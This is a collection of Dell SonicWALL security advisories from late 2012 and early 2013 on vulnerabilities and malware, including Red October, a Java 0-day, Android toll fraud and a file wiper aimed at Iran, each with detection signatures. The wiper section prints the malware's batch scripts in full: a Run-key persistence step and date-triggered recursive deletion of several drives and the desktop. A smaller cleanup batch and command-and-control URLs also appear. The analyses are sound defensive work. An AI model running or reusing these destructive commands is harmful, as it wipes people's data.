Novell NetIQ eDirectory NCP Buffer Overflow (Jan 23, 2013)

/in /by

Novell eDirectory is an X.500-compatible directory service software product initially released in 1993 by Novell for centrally managing access to resources on multiple servers and computers within a given network. The product is made available for multiple platforms including NetWare, Unix-like systems, and Windows. It supports referential integrity, multi-master replication, and has a modular authentication architecture. The software can be accessed via LDAP, DSML, SOAP, ODBC, JDBC, JNDI, and ADSI.

Novell eDirectory utilizes Novell NetWare Core Protocol (NCP) for network communication. The NetWare Core Protocol (NCP) manages access requirement to the primary NetWare server resources such as the file system and the printing system as well as login requests. NCP is a client/server protocol which uses the underlying Internetwork Packet Exchange Layer Services (IPX), which is obsoleted. More recent version of NCP can also use TCP/IP. NCP over TCP/IP messages has the following common header structure: 

 Offset  Size  Description ------- ----- ------------------------------------------------------ 0x0000  4     NCP/IP signature, 'DmdT' for request, 'tNcP' for reply 0x0004  4     NCP/IP Length, including the NCP over IP header 0x0008  4     NCP/IP Version (Request only) 0x000C  4     NCP/IP Reply Buffer Size (Request only)

A stack-based overflow vulnerability has been identified in the Novell eDirectory server. When processing a NCP request, a stack buffer size was not validated before the user supplied data was copied to the memory. An attacker can exploit this vulnerability to cause a stack overflow which would allows for arbitrary code injection and execution with the privileges of the eDirectory service, by default SYSTEM.

Dell SonicWALL UTM team has researched this vulnerability and released the following IPS signatures to detect the attack attempts.

  • 9541 Novell NetIQ eDirectory NCP Buffer Overflow 1
  • 9546 Novell NetIQ eDirectory NCP Buffer Overflow 2

An existing generic shellcode signature is able to detect the attacks addressing this issue too.

  • 4813 Server Application Shellcode Exploit 6

This vulnerability has been referred by CVE as CVE-2012-0432

Red October cyber-espionage malware uses MS Office exploits (Jan 18, 2013)

/in /by

The Dell Sonicwall Threats research team received reports of malware that has targeted international diplomatic service agencies. The malware named Red October is part of a large scale cyber-espionage network that has been in existence since 2007. It is designed to steal sensitive information from infected systems. The malware uses GAV: CVE-2012-0158 (Exploit) and GAV: CVE-2010-3333 (Exploit) that exploit known vulnerabilities in unpatched versions of Microsoft Word and Excel. There have also been reports of the malware using Java vulnerabilities: GAV: CVE-2011-3544 (Exploit). It is reported that the Trojan is spread via email and uses infected Word and Excel files.

Infection cycle:

The file containing the exploit may be a legitimate but infected Word or Excel file. In this case it was an Excel file:

After the exploit has run successfully it will cause Excel to display a spreadsheet containing fake corporate data in order to thwart suspicion:

The Trojan adds the following keys to the windows registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon Userinit “%WINDIR%system32userinit.exe,%PROGRAMFILES%Windows NTsvchost.exe”
  • HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{00000000-6948-B838-A1A0-B0132CCF0BA1} @ “D74C3FB1”
  • HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{00000000-7657-A727-BEBF-AF0C33D014BE} @ “C85320AE”

The Trojan adds the following files to the filesystem:

  • %PROGRAMFILES%Windows NTlhafd.gcp
  • %PROGRAMFILES%Windows NTsvchost.exe [Detected as GAV: Rocra.A (Trojan)]
  • %TEMP%msc.bat
  • %TEMP%Dsc.tmp [Detected as GAV: Kolab.ABVR (Worm)]

msc.bat contains the following post-infection clean up code:

      chcp 1251
      :Repeat
      attrib -a -s -h -r "%TEMP%Dcs.tmp"
      del "%TEMP%Dcs.tmp"
      if exist "%TEMP%Dcs.tmp" goto Repeat
      del "%TEMP%msc.bat"

The chcp command suggests that the malware is Russian in origin. 1251 is the ANSI codepage for Cyrillic.

The Trojan was observed querying microsoft.com to verify internet connectivity:

The Trojan was observed using the CreateEvent API in order to be alerted of various system events:

The Trojan steals information from the following web browsers:

  • Google Chrome
  • Mozilla Firefox
  • Internet Explorer
  • Opera

We observed the Trojan reading data from files written by Firefox that we had installed on the system:

It is widely reported that the Trojan contains the ability to update and add modules from a remote Command & Control server.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Exploit.CVE-2012-0158 (Exploit)
  • GAV: Exploit.CVE-2010-3333 (Exploit)
  • GAV: Exploit.CVE-2011-3544 (Exploit)
  • GAV: Kolab.ABVR (Worm)
  • GAV: Rocra.A (Trojan)

Ruby on Rails Vulnerabilities (Jan 16, 2013)

/in /by

Ruby on Rails (RoR) is an open source full-stack web application framework for the Ruby programming language. Ruby on Rails emphasizes the use of well-known software engineering patterns and principles, such as “Active record pattern”, “Convention over Configuration”, “Don’t Repeat Yourself” and “Model-View-Controller”.

During the past weeks several RoR vulnerabilities have emerged. The first is an SQL injection attack. By utilizing two different vulnerabilities, CVE-2012-6496 and CVE-2012-6497, an attacker could inject and execute arbitrary SQL queries. However, in order to perform SQL injection the attacker needs to tamper the cookie. This makes attacking and detecting attacks difficult since both require understanding of session secret (cracking the HMAC key).

The second is a remote code execution vulnerability (CVE-2013-0156). The vulnerability is due to a design error when deserializing user-provided YAML (“YAML Ain’t Markup Language”, a data serialization format) strings; eventually the module_eval() function will execute parsed YAML strings which allows execution of shell commands. An attacker could exploit this vulnerability by sending crafted POST requests to the RoR server. Successful exploitation will result in arbitrary code execution within the context of web service.

Dell SonicWALL has released IPS signatures to detect and block specific exploitation attempts targeting CVE-2013-0156. The signatures are listed below:

  • 9486 Ruby on Rails SqlLiteral SQL Injection
  • 9487 Ruby on Rails Remote Code Execution 1
  • 9488 Ruby on Rails Remote Code Execution 2

Over the past week Dell SonicWALL has observed several instances of exploit attempts targeting CVE-2013-0156 however the volume is very low.

New Java 0-day drive-by exploit (Jan 10, 2013)

/in /by

The Dell Sonicwall Threats research team received reports of a new 0-day exploit affecting Java 1.7 Update 9, 10 and possibly earlier versions of Java. It has been reported that this new exploit has already been integrated into the existing Blackhole Exploit Kit that is currently in use by cyber criminals. At the time of writing, this vulnerability is currently unpatched.

Infection cycle:

The infection occurs when visiting a malicious webpage that may look similar to the one below:

The webpage contains a malicious Blackhole Exploit script [Detected as GAV: Blacole.gen_26 (Exploit)]:

The script downloads additional jar files with class files containing GAV: Exploit.CVE-2013-0422 (Exploit)

From our analysis and sources we discovered 3 jar files that contain the Java exploit:

  • Counsel.jar [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]
  • Edit.jar [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]
  • UTTER-OFFEND.JAR [Detected as GAV: Exploit.CVE-2013-0422 (Exploit)]

The class file ewjvaiwebvhtuai124a.class containing the exploit contains more raw class file data which typically starts with CAFEBABE hexcode:

The class file contains instructions to download and execute a malicious executable: calc.exe:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Exploit.CVE-2013-0422 (Exploit)
  • GAV: Blacole.gen_26 (Exploit)
  • GAV: CoolEK.Java.1 (Exploit)

Yet another Toll Fraud malware for Android (January 11, 2013)

/in /by

Dell Sonicwall Threats Research Team received reports of a new Toll Fraud Android malware spreading in the wild. Toll Fraud is a process where the victim is billed for service requested by a malicious medium without the victims knowledge. This malware sends SMS messages to premium rate numbers along with device related information to the Command and Control (C&C) servers. This information is used to further spread the malware.
Over the last year there has been a steep rise in Toll Fraud malwares for Android. Recent reports and statistics have shown that such malwares have sapped millions of dollars from victims all over the world. Their primary means of spreading is through malicious apps. The victims are enticed in downloading such apps through links sent in Emails and SMS messages.

The malware requests for the following permissions during installation:

  • Internet
  • Receive_Boot_Completed
  • Read_Phone_State
  • Receive_Sms
  • Read_Contacts
  • Send_Sms
  • Write_External_Storage

Upon installation the malware is visible in the app drawer as follows:

Infection Cycle

If the user clicks on the installed app, it does not appear to do anything. But in the background the app is busy transferring all contacts on the device to the C&C along with vital device related information. The following information was seen being transferred in the first run of the app as a POST query:

  • IMEI
  • IMSI
  • Android Version
  • Contacts

Contacts on the device are sent in a Contacts.xml file. The following screenshot shows contents of the Contacts.xml file:

After the first run the following information is periodically sent to the attacker:

  • IMEI
  • IMSI
  • Time
  • Android Version

The malware expects to receive a file named Connect.php.xml which contains key information sent by the attacker. We found checks in the malwares code for the following elements:

  • Send
    • number – SMS is sent to this number
    • text – Content of the SMS sent
  • Delete
    • number – SMS sent to this number will not be stored in the message archive

Once the malware receives this file, it starts sending SMS to the numbers specified in the file which are usually Premium Rate Numbers.

The malware is capable of accepting commands from the C&C in the form of SMS messages. Commands are of the format ServerKey+Command. The server key can be seen hardcoded in the malware:


We found two commands in the code which are scanned for in every incoming SMS:

  • 001
  • 002

We sent a plain SMS followed by SMS’s which had ServerKey+Command format to the malware in our labs. The messages which followed the right format cannot be seen in the inbox nor in the messages database. The message notification for such SMS is disabled using abortBroadcast().

During our analysis we observed the malware connecting to the following link:

  • http://load-center.ru/connect.php

We found the following link in the malware code:

  • http://stat.load-center.ru/replies.php

The main source of income for this malware is through Toll Fraud. The malware also harvests potential targets from the victims contact list to whom it can spread further by sending SMS containing links to download malicious apps.

Dell SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: Stealer.F (Trojan)

    • Microsoft Security Bulletin Coverage (Jan 8, 2013)

    /in /by

    Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2013. A list of issues reported, along with Dell SonicWALL coverage information follows:

    MS13-001 Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution

    • CVE-2013-0011 Windows Print Spooler Components Vulnerability
      No known exploits exist in the wild.

    MS13-002 Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution

    • CVE-2013-0006 MSXML Integer Truncation Vulnerability
      No feasible way to detect attacks without a large number of false positives.
    • CVE-2013-0007 MSXML XSLT Vulnerability
      No feasible way to detect attacks without a large number of false positives.

    MS13-003 Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege

    • CVE-2013-0009 System Center Operations Manager Web Console XSS Vulnerability
      No feasible way to detect attacks without a large number of false positives.
    • CVE-2013-0010 System Center Operations Manager Web Console XSS Vulnerability
      IPS:9473 – Microsoft System Center Operations Manager XSS

    MS13-004 Vulnerabilities in .NET Framework Could Allow Elevation of Privilege

    • CVE-2013-0001 System Drawing Information Disclosure Vulnerability
      No known exploits exist in the wild.
    • CVE-2013-0002 WinForms Buffer Overflow Vulnerability
      No known exploits exist in the wild.
    • CVE-2013-0003 S.DS.P Buffer Overflow Vulnerability
      No known exploits exist in the wild.
    • CVE-2013-0004 Double Construction Vulnerability
      No known exploits exist in the wild.

    MS13-005 Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege

    • CVE-2013-0008 Win32k Improper Message Handling Vulnerability
      This is a local EoP vulnerability; detection of attacks on the wire is not possible.

    MS13-006 Vulnerability in Microsoft Windows Could Allow Security Feature Bypass

    • CVE-2013-0013 Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability
      IPS:9472 – SSL Version Rollback

    MS13-007 Vulnerability in Open Data Protocol Could Allow Denial of Service

    • CVE-2013-0005 Replace Denial of Service Vulnerability
      IPS:9471 – Open Data Protocol DoS

    Squid Resource Exhaustion Vulnerability (Jan 4, 2013)

    /in /by

    Squid is a popular open source proxy server and web cache daemon. It has a wide variety of uses, including sharing network resources, speeding up a web server and aiding network security (by filtering traffic).

    A resource exhaustion vulnerability exists in Squid. Specifically, the vulnerability is due to lack of sanitation of user supplied parameters sent to Squid’s cache manager “cachemgr.cgi”. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the Squid server. Successful exploitation allows the attacker to cause a memory exhaustion, leading to a denial of service condition.

    The vulnerability has been assigned as CVE-2012-5643.

    Dell SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

    • 9450 Squid cachemgr.cgi DoS

    Windows IE Button Element Use-After-Free (Dec 31, 2012)

    /in /by

    Microsoft has released an out-of-band Microsoft Security Advisory (2794220) addressing an IE vulnerability on Dec 29th, 2012. The vulnerability is involved in Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8. But Internet Explorer 9 and Internet Explorer 10 are not affected. The vulnerabilities is referred by CVE as CVE-2012-4792.

    Dell SonicWALL UTM team has researched this vulnerability as soon as possible and created a couple of IPS signatures to capture the attack traffic. The following are the list of the IPS signatures.

    • 9445 Windows IE Button Element Use-After-Free 1
    • 9446 Windows IE Button Element Use-After-Free 2

    For the Microsoft vulnerabilities covered by Dell SonicWALL, please refer to SonicWALL MAPP for details.

    Update: we have also released another SonicAlert IE 0 day used in watering hole attacks (Jan 2, 2013) addressing a specific exploit in the wild.

    IE 0 day used in watering hole attacks (Jan 2, 2013)

    /in /by

    Dell SonicWALL UTM Research team received reports of a new zero day exploit targeting Internet Explorer being employed in watering hole attacks. These attacks target a use-after-free vulnerability in Internet Explorer version 8 running on Windows XP or Windows 7 operating systems. Versions 6 and 7 of Internet Explorer are also vulnerable to this exploit but were not targetted in this attack. This vulnerability is documented under CVE-2012-4792 and Microsoft has released an advisory for it.

    A watering hole attack involves planting exploits and payload on compromised sites which are likely to be visited by the victims being targetted. In this case, the site of a think tank headquartered in the US and an organization selling energy generation equipment also headquartered in the US were compromised and the exploits were loaded on to their sites. The attacks were targetting visitors of these sites with a Backdoor Trojan.

    Infection Cycle

    The exploit is attempted using an SWF and multiple Javascript components. The exploit is only attempted if the flash plugin is installed, IE version is 8, speicifc language packs are installed and Java version 6 is installed. On successful exploit, it leads to the download and execution of a Backdoor Trojan.

    image

    The initial DLL payload is XOR’ed using the key ‘0x83’ and is decrypted by the SWF component. This in turn drops a Backdoor Trojan which does the following:

    • It creates a copy of itself appended with random overlay(different hash/footprint in each infection):
      %COMMONPROGRAMFILES%DirectDB.exe [Detected as “GAV: Shyape.B (Trojan)”
    • It creates an instance of iexplorer.exe and injects code in to it
    • It attempts to contact a remote server which was found to be offline at the time of analysis. The initial request intercepted with the aid of a simulated server is shown below:

      • image

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: Bogidow.A (Exploit)
    • GAV: Bifrose.N (Trojan)
    • GAV: Shyape.A (Trojan)
    • GAV: Shyape.B (Trojan)
    • IPS: 9445 Windows IE Button Element Use-After-Free 1
    • IPS: 9446 Windows IE Button Element Use-After-Free 2

    New File Wiper Trojan targeting Iran (Dec 21, 2012)

    /in /by

    The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: Delete files on a range of specified drives on specified dates. This can be on remote storage devices or local external storage as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.

    Infection cycle:

    The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:

    • %SYSTEM32%jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
    • %SYSTEM32%juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
    • %SYSTEM32%SLEEP.EXE [non-malicious sleep utility]
    • %USERPROFILE%Local SettingsTempE.tmpjuboot.bat [dropped by juboot.exe]
    • %USERPROFILE%Local SettingsTemp11.tmpjucheck.bat [dropped by jucheck.exe]

    The Trojan adds the following key to the windows registry to enable startup after reboot:

    • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun jucheck.exe “%SYSTEM32%jucheck.exe”

    The file juboot.bat contains the following data that is used to initiate infection:

        @echo off & setlocal
        sleep for 2
        REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d "%systemroot%system32jucheck.exe" /f
        start "" /D"%systemroot%system32" "jucheck.exe"

    The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:

        @echo off & setlocal
        sleep for 2
        del "%systemroot%system32juboot.exe" /q /s /f
        del "%userprofile%Start MenuProgramsStartupGrooveMonitor.exe" /q /s /f
        if "%date%"=="Mon 12/10/2012" goto yes
        if "%date%"=="Tue 12/11/2012" goto yes
        if "%date%"=="Wed 12/12/2012" goto yes
        if "%date%"=="Mon 01/21/2013" goto yes
        if "%date%"=="Tue 01/22/2013" goto yes
        if "%date%"=="Wed 01/23/2013" goto yes
        if "%date%"=="Mon 05/06/2013" goto yes
        if "%date%"=="Tue 05/07/2013" goto yes
        if "%date%"=="Wed 05/08/2013" goto yes
        if "%date%"=="Mon 07/22/2013" goto yes
        if "%date%"=="Tue 07/23/2013" goto yes
        if "%date%"=="Wed 07/24/2013" goto yes
        if "%date%"=="Mon 11/11/2013" goto yes
        if "%date%"=="Tue 11/12/2013" goto yes
        if "%date%"=="Wed 11/13/2013" goto yes
        if "%date%"=="Mon 02/03/2014" goto yes
        if "%date%"=="Tue 02/04/2014" goto yes
        if "%date%"=="Wed 02/05/2014" goto yes
        if "%date%"=="Mon 05/05/2014" goto yes
        if "%date%"=="Tue 05/06/2014" goto yes
        if "%date%"=="Wed 05/07/2014" goto yes
        if "%date%"=="Mon 08/11/2014" goto yes
        if "%date%"=="Tue 08/12/2014" goto yes
        if "%date%"=="Wed 08/13/2014" goto yes
        if "%date%"=="Mon 02/02/2015" goto yes
        if "%date%"=="Tue 02/03/2015" goto yes
        if "%date%"=="Wed 02/04/2015" goto yes
        goto no
        :yes
        sleep for 3000
        IF EXIST d: del "d:*.*" /q /s /f
        IF EXIST d: Chkdsk d:
        IF EXIST e: del "e:*.*" /q /s /f
        IF EXIST e: Chkdsk e:
        IF EXIST f: del "f:*.*" /q /s /f
        IF EXIST f: Chkdsk f:
        IF EXIST g: del "g:*.*" /q /s /f
        IF EXIST g: Chkdsk g:
        IF EXIST h: del "h:*.*" /q /s /f
        IF EXIST h: Chkdsk h:
        IF EXIST i: del "i:*.*" /q /s /f
        IF EXIST i: Chkdsk i:
        del "%userprofile%Desktop*.*" /q /s /f
        \start calc
        :no

    The .bat files are deleted after execution.

    SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

    • GAV: DelFiles.NBV (Trojan)
    • GAV: Batchwiper.A (Trojan)